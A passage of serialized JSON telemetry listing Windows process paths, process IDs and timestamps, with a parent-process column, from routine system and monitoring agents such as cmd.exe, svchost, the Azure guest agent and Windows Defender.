15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c24|2019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1770|2019-02-10 15:44:47.250000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x8dc|2019-02-09 21:02:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xd74|2019-02-09 23:22:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x6f8|2019-02-09 23:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1fc0|2019-02-10 00:02:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x10bc|2019-02-10 00:12:56.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xb48|2019-02-10 00:32:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xbd0|2019-02-09 21:32:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x15c8|2019-02-09 20:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xe34|2019-02-09 22:02:56.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x53c|2019-02-09 22:32:56.247000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xef4|2019-02-09 22:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xcd8|2019-02-09 20:52:56.260000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x181c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc|2019-02-09 21:09:24.310000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xccc|2019-02-09 23:20:15.547000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0xda8|2019-02-09 23:55:46.057000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x798|2019-02-10 00:26:22.213000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe2c|2019-02-10 01:31:14.010000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xb14|2019-02-10 02:31:30.377000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xb14|2019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1898|2019-02-10 02:35:21.217000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xe1c|2019-02-10 03:35:37.273000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xe1c|2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17c4|2019-02-10 03:39:26.323000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x2e4|2019-02-10 04:39:41.880000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x2e4|2019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1360|2019-02-10 04:43:32.697000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x19f0|2019-02-10 05:43:48.783000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x19f0|2019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17a8|2019-02-10 05:47:40.657000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x82c|2019-02-10 05:55:52.110000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1bfc|2019-02-10 06:47:56.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1bfc|2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c10|2019-02-10 06:51:50.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xc6c|2019-02-10 07:52:06.713000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xc6c|2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 07:56:00.233000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1070|2019-02-10 08:56:16.593000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1070|2019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xb10|2019-02-10 09:00:10.517000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x8c0|2019-02-09 22:16:24.523000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-10 10:00:27.043000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xc98|2019-02-10 10:04:18.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1484|2019-02-10 11:04:35.127000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1484|2019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x16bc|2019-02-10 11:08:29.550000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x1be4|2019-02-10 11:55:57.567000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd68|2019-02-10 12:08:46.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd68|2019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1eb4|2019-02-10 12:12:35.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x6f8|2019-02-10 13:12:52.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x6f8|2019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|2019-02-10 13:16:43.013000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x16d4|2019-02-10 14:16:59.427000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x16d4|2019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 14:20:50.820000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd78|2019-02-10 15:21:06.890000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd78|2019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1238|2019-02-10 15:24:56.040000\",\"NaN\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe|0x7c8|1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1420|2019-02-09 22:54:40.460000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1420|2019-02-09 22:54:40.460000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x9ac|2019-02-09 22:54:40.497000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe|0x1078|2019-02-09 22:55:15.427000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe|0x7c8|1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1a44|2019-02-09 22:54:40.470000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1a44|2019-02-09 22:54:40.470000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe|0x7c8|1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x99c|2019-02-09 22:54:40.520000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe|0x7c8|1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe|0x7c8|1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x205c|2019-02-09 22:55:12.353000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x205c|2019-02-09 22:55:12.353000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xaec|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xaec|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xaec|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe|0xc14|2019-02-09 22:55:06.653000\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe|0x1f24|2019-02-09 22:55:07.023000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xaec|1970-01-01 00:00:00.000000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service 